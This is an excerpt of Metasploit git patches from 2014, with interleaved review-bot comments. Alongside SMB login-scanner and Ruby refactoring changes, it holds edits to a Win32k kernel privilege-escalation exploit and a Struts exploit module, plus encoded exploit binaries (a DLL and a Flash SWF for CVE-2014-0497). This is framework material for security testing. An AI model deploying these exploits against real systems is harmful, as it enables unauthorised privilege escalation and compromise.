fadedcode.net>' # admin check/bug fix ], 'References' => [ 
@@ -69,6 +71,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('SMBPass', [ false, "SMB Password" ]), OptString.new('SMBUser', [ false, "SMB Username" ]), OptString.new('SMBDomain', [ false, "SMB Domain", '']), + OptBool.new('CHECK_ADMIN', [ false, "Check for Admin rights", false]), OptBool.new('PRESERVE_DOMAINS', [ false, "Respect a username that contains a domain name.", true]), OptBool.new('RECORD_GUEST', [ false, "Record guest-privileged random logins to the database", false]) ], self.class) @@ -124,6 +127,27 @@ class Metasploit3 < Msf::Auxiliary # Windows SMB will return an error code during Session Setup, but nix Samba requires a Tree Connect: simple.connect("\\\\#{datastore['RHOST']}\\IPC$") status_code = 'STATUS_SUCCESS' + + if datastore['CHECK_ADMIN'] + status_code = :not_admin + # Drop the existing connection to IPC$ in order to connect to admin$ + simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$") + begin + simple.connect("\\\\#{datastore['RHOST']}\\admin$") + status_code = :admin_access + # Restore the orginal connection + simple.disconnect("\\\\#{datastore['RHOST']}\\admin$") + simple.connect("\\\\#{datastore['RHOST']}\\IPC$") + rescue + status_code = :not_admin + ensure + begin + simple.connect("\\\\#{datastore['RHOST']}\\IPC$") + rescue ::Rex::Proto::SMB::Exceptions::NoReply + end + end + end + rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e status_code = e.get_error(e.error_code) rescue ::Rex::Proto::SMB::Exceptions::LoginError => e @@ -187,7 +211,16 @@ class Metasploit3 < Msf::Auxiliary end def valid_credentials?(status) - return (status == "STATUS_SUCCESS" || @correct_credentials_status_codes.include?(status)) + + case status + when 'STATUS_SUCCESS', :admin_access, :not_admin + return true + when *@correct_credentials_status_codes + return true + else + return false + end + end def try_user_pass(domain, user, pass) 
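Review bot: In the `CHECK_ADMIN` block the bare `rescue` turns every StandardError into `:not_admin`, so a timeout or dropped connection while connecting to `admin$` is recorded as a confirmed non-admin login rather than as an error. Rescuing only the expected failure, `rescue ::Rex::Proto::SMB::Exceptions::ErrorCode`, would keep the two cases apart. On success `IPC$` is reconnected twice, once inside the `begin` body and again in `ensure`; the `simple.connect` in the body can be dropped. `status_code` now holds either a String or a Symbol, which the `case` statements in the later hunks have to know about; a short comment at the assignment would help. The enclosing method starts outside this hunk.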
@@ -214,7 +247,7 @@ class Metasploit3 < Msf::Auxiliary output_message << " (#{smb_peer_os}) #{user} : #{pass} [#{status}]".gsub('%', '%%') case status - when 'STATUS_SUCCESS' + when 'STATUS_SUCCESS', :admin_access, :not_admin # Auth user indicates if the login was as a guest or not if(simple.client.auth_user) print_good(output_message % "SUCCESSFUL LOGIN") @@ -275,7 +308,7 @@ class Metasploit3 < Msf::Auxiliary def report_creds(domain,user,pass,active) login_name = "" - if accepts_bogus_domains?(user,pass,rhost) + if accepts_bogus_domains?(user,pass,rhost) || domain.blank? login_name = user else login_name = "#{domain}\\#{user}" From 850f6b02765c7dc6cb8225b8954a7b1df3677027 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 2 May 2014 13:33:55 +0100 Subject: [PATCH 233/853] Address OJ's comments --- .../source/exploits/cve-2013-1300/schlamperei/schlamperei.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c index 9b08be0379..c7fea10a62 100755 --- a/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c +++ b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c @@ -26,7 +26,7 @@ typedef NTSTATUS *PNTSTATUS; #define TABLE_BASE 0xff910000 -#define EXPLOIT_MSG 0xd +#define EXPLOIT_MSG WM_GETTEXT // global variables FTW HWND gHwnd = 0x0; @@ -231,7 +231,7 @@ typedef long (*_RtlCreateUserThread)(HANDLE, _RtlCreateUserThread RtlCreateUserThread; -int Schlamperei(LPVOID shellcode) +int Schlamperei() { // Create window which will execute the wndproc in kernel mode HWND wnd = createhelperwnd(); @@ -278,7 +278,7 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { } break; case DLL_PROCESS_ATTACH: - Schlamperei(lpReserved); + Schlamperei(); break; case DLL_PROCESS_DETACH: case DLL_THREAD_ATTACH: From 69915c0de545460442a4ee3c40e78f4b6b20a188 Mon Sep 17 00:00:00 2001 
From: Meatballs Date: Fri, 2 May 2014 14:17:27 +0100 Subject: [PATCH 234/853] Message correction --- modules/exploits/windows/local/ms13_053_schlamperei.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index 1b8916b7b6..93748a9c31 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Local process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError - print_status("Operation failed. Trying to elevate the current process...") + print_status("Operation failed. Hosting exploit in the current process...") process = client.sys.process.open end From 56c5eac8234056105474fbbfc630914736f60fdc Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 2 May 2014 14:18:18 +0100 Subject: [PATCH 235/853] Message correction --- modules/exploits/windows/local/ms13_053_schlamperei.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index 93748a9c31..48e9fa8da3 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb 
@@ -15,13 +15,13 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection - + def initialize(info={}) super(update_info(info, { 'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)', 'Description' => %q{ A kernel pool overflow in Win32k which allows local privilege escalation. - The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). + The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash. From 06c8082187cbfa07eadf91d26d7a5c04204275db Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 2 May 2014 14:45:14 +0100 Subject: [PATCH 236/853] Use signed binary --- data/exploits/cve-2013-1300/schlamperei.dll | Bin 10240 -> 0 bytes .../cve-2013-1300/schlamperei.x86.dll | Bin 72192 -> 72192 bytes 2 files changed, 0 insertions(+), 0 deletions(-) delete mode 100644 data/exploits/cve-2013-1300/schlamperei.dll mode change 100755 => 100644 data/exploits/cve-2013-1300/schlamperei.x86.dll 
diff --git a/data/exploits/cve-2013-1300/schlamperei.dll b/data/exploits/cve-2013-1300/schlamperei.dll deleted file mode 100644 index 68b6fe9b1d42adbe5d8d66c83aa00676cbea8428..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 10240 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 delta 1093 zcmeIw%S%*I90%~<@7@{5#}q?Jj*n1lkv(wE70F4AYhW@EMKrT8GYfp6QK>CNEYQU) zOi3nAh_r}EEDKBN$Rw2{<-#^Lxd<06Tm+3V3?oDgHjI4-nsxs`2R@hc{GD^p?+nga z2Ink+xE|cvclY;ceZ%Ca=l7=NkiyI@1b#fiT3uZed!_WD3Dsn1=f> z4870_AVPAG?J@PH4ZK(wDIh(CA+W8jAy&U>Mv&!(GR9$Rp5=KCZv_2eFOwJ97Of#0W%aXhkEBv41f9F_z+^ouwi<;wQJXl=sG%HQF*7%}5jB9ATFA8N7f$N&HU From 36f9f342c1ec47fd3673c0ec8a9796055f3ffa24 Mon Sep 17 00:00:00 2001 From: julianvilas Date: Fri, 2 May 2014 16:26:08 +0200 Subject: [PATCH 237/853] Fix typo --- modules/exploits/multi/http/struts_code_exec_classloader.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index d44e390350..ee944aaeae 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Mark Thomas', # Vulnerability Discovery 'Przemyslaw Celej', # Vulnerability Discovery - 'pwntester ', # PoC 'Redsadic ' # Metasploit Module ], 'License' => MSF_LICENSE, 
@@ -192,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::TimeoutExpired, "#{peer} - No answer") end - # Check if the log file exists and hass been flushed + # Check if the log file exists and has been flushed if check_log_file(normalize_uri(target_uri.to_s)) register_files_for_cleanup(@jsp_file) From a47b88308321f0cd08526c92ba0369d4b81cef85 Mon Sep 17 00:00:00 2001 From: Tom Sellers Date: Fri, 2 May 2014 12:46:50 -0500 Subject: [PATCH 238/853] Remove redundant simple.connect Remove redundant simple.connect. Thanks @jlee-r7 --- modules/auxiliary/scanner/smb/smb_login.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 979b8817c3..469922e012 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -135,9 +135,7 @@ class Metasploit3 < Msf::Auxiliary begin simple.connect("\\\\#{datastore['RHOST']}\\admin$") status_code = :admin_access - # Restore the orginal connection simple.disconnect("\\\\#{datastore['RHOST']}\\admin$") - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") rescue status_code = :not_admin ensure From 5b1a2073770472bbacacf00770e9021d62b4b5e1 Mon Sep 17 00:00:00 2001 From: Joshua Smith Date: Fri, 2 May 2014 19:52:58 -0400 Subject: [PATCH 239/853] cleans up numerous superfluous returns in msf/core/module --- lib/msf/core/module.rb | 82 ++++++++++++++++++------------------------ 1 file changed, 34 insertions(+), 48 deletions(-) diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index 170f8099dd..53fcd66ade 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -34,11 +34,11 @@ class Module end def fullname - return type + '/' + refname + type + '/' + refname end def shortname - return refname.split('/')[-1] + refname.split('/').last end # 
@@ -84,7 +84,7 @@ class Module # Returns the class reference to the framework # def framework - return self.class.framework + self.class.framework end # @@ -178,6 +178,7 @@ class Module # def print_prefix + ret = '' if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || ( framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i ) @@ -189,10 +190,9 @@ class Module prefix << "[%04d] " % xn end - return prefix - else - return '' + ret = prefix end + ret end def print_status(msg='') @@ -257,7 +257,7 @@ class Module # payloads/windows/shell/reverse_tcp # def fullname - return self.class.fullname + self.class.fullname end # @@ -267,28 +267,28 @@ class Module # windows/shell/reverse_tcp # def refname - return self.class.refname + self.class.refname end # # Returns the module's rank. # def rank - return self.class.rank + self.class.rank end # # Returns the module's rank in string format. # def rank_to_s - return self.class.rank_to_s + self.class.rank_to_s end # # Returns the module's rank in display format. # def rank_to_h - return self.class.rank_to_h + self.class.rank_to_h end # @@ -299,14 +299,14 @@ class Module # reverse_tcp # def shortname - return self.class.shortname + self.class.shortname end # # Returns the unduplicated class associated with this module. # def orig_cls - return self.class.orig_cls + self.class.orig_cls end # @@ -366,30 +366,14 @@ class Module # Returns the address of the last target host (rough estimate) # def target_host - if(self.respond_to?('rhost')) - return rhost() - end - - if(self.datastore['RHOST']) - return self.datastore['RHOST'] - end - - nil + self.respond_to?('rhost') ? rhost : self.datastore['RHOST'] end # # Returns the address of the last target port (rough estimate) # def target_port - if(self.respond_to?('rport')) - return rport() - end - - if(self.datastore['RPORT']) - return self.datastore['RPORT'] - end - - nil + self.respond_to?('rport') ? rport : self.datastore['RPORT'] end # 
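Review bot: `print_prefix` now carries a `ret` local through the method (`ret = ''` in the hunk at `@@ -178,6 +178,7 @@`, then `ret = prefix` and a trailing `ret` in the hunk at `@@ -189,10 +190,9 @@`), which swaps two explicit returns for an assignment-and-read pattern instead of removing them. Because `if` is an expression in Ruby, the method can end on the conditional itself: leave `prefix` as the last line of the `if` branch and keep `else` with `''` as the other branch, with no `ret` at all. Part of the method body lies between the two hunks and is not shown, so check that nothing there depends on `ret`.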
@@ -516,7 +500,7 @@ class Module # Return a comma separated list of author for this module. # def author_to_s - return author.collect { |author| author.to_s }.join(", ") + author.collect { |author| author.to_s }.join(", ") end # @@ -530,7 +514,7 @@ class Module # Return a comma separated list of supported architectures, if any. # def arch_to_s - return arch.join(", ") + arch.join(", ") end # @@ -544,16 +528,18 @@ class Module # Return whether or not the module supports the supplied architecture. # def arch?(what) - return true if (what == ARCH_ANY) - - return arch.index(what) != nil + if (what == ARCH_ANY) + true + else + arch.index(what) != nil + end end # # Return a comma separated list of supported platforms, if any. # def platform_to_s - return ((platform.all?) ? [ "All" ] : platform.names).join(", ") + platform.all? ? "All" : platform.names.join(", ") end # @@ -567,7 +553,7 @@ class Module # Returns whether or not the module requires or grants high privileges. # def privileged? - return (privileged == true) + privileged == true end # @@ -575,7 +561,7 @@ class Module # this somewhere else. # def comm - return Rex::Socket::Comm::Local + Rex::Socket::Comm::Local end # @@ -749,7 +735,7 @@ class Module # Constants indicating the reason for an unsuccessful module attempt # module Failure - + # # No confidence in success or failure # @@ -814,7 +800,7 @@ class Module # The payload was delivered but no session was opened (AV, network, etc) # PayloadFailed = 'payload-failed' - end + end ## 
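Review bot: In `author_to_s`, the block parameter in `author.collect { |author| author.to_s }` has the same name as the `author` method it is called on, so inside the block `author` refers to one element and not to the list. Since this line is being touched anyway, the symbol form removes the shadowing: `author.map(&:to_s).join(", ")`.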
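Review bot: The rewritten `arch?` replaces a guard clause with a five-line `if`/`else` whose branches are only `true` and a boolean, and it keeps the explicit nil comparison `arch.index(what) != nil`. A single boolean expression states the same rule: `what == ARCH_ANY || arch.include?(what)`. This assumes `arch` returns an Array, which `arch.join(", ")` in `arch_to_s` suggests but the hunk does not show.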
@@ -827,42 +813,42 @@ class Module # Returns true if this module is an exploit module. # def exploit? - return (type == MODULE_EXPLOIT) + (type == MODULE_EXPLOIT) end # # Returns true if this module is a payload module. # def payload? - return (type == MODULE_PAYLOAD) + (type == MODULE_PAYLOAD) end # # Returns true if this module is an encoder module. # def encoder? - return (type == MODULE_ENCODER) + (type == MODULE_ENCODER) end # # Returns true if this module is a nop module. # def nop? - return (type == MODULE_NOP) + (type == MODULE_NOP) end # # Returns true if this module is an auxiliary module. # def auxiliary? - return (type == MODULE_AUX) + (type == MODULE_AUX) end # # Returns true if this module is an post-exploitation module. # def post? - return (type == MODULE_POST) + (type == MODULE_POST) end # @@ -1073,7 +1059,7 @@ protected merge_check_key(info, name, val) } - return info + info end # From b4c7c5ed1f335a8f9b5e66c1171c2e317b7a5488 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 3 May 2014 20:04:46 -0500 Subject: [PATCH 240/853] Add module for CVE-2014-0497 --- data/exploits/CVE-2014-0497/Vickers.swf | Bin 0 -> 3534 bytes .../source/exploits/CVE-2014-0497/Vickers.as | 797 ++++++++++++++++++ .../windows/browser/adobe_flash_avm2.rb | 132 +++ 3 files changed, 929 insertions(+) create mode 100755 data/exploits/CVE-2014-0497/Vickers.swf create mode 100755 external/source/exploits/CVE-2014-0497/Vickers.as create mode 100644 modules/exploits/windows/browser/adobe_flash_avm2.rb 
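Review bot: The six type predicates (`exploit?`, `payload?`, `encoder?`, `nop?`, `auxiliary?`, `post?`) keep the parentheses left over from the `return (...)` form, for example `(type == MODULE_EXPLOIT)`. The same commit drops them in `privileged?`, which now reads `privileged == true`. For consistency the bodies here can be written the same way: `type == MODULE_EXPLOIT`.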
diff --git a/data/exploits/CVE-2014-0497/Vickers.swf b/data/exploits/CVE-2014-0497/Vickers.swf new file mode 100755 index 0000000000000000000000000000000000000000..f0e1ccb1f47f4177f1c68cefdc6f35cbbac0ce3d GIT binary patch literal 3534 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 I5&qXrD#5AhB>(^b literal 0 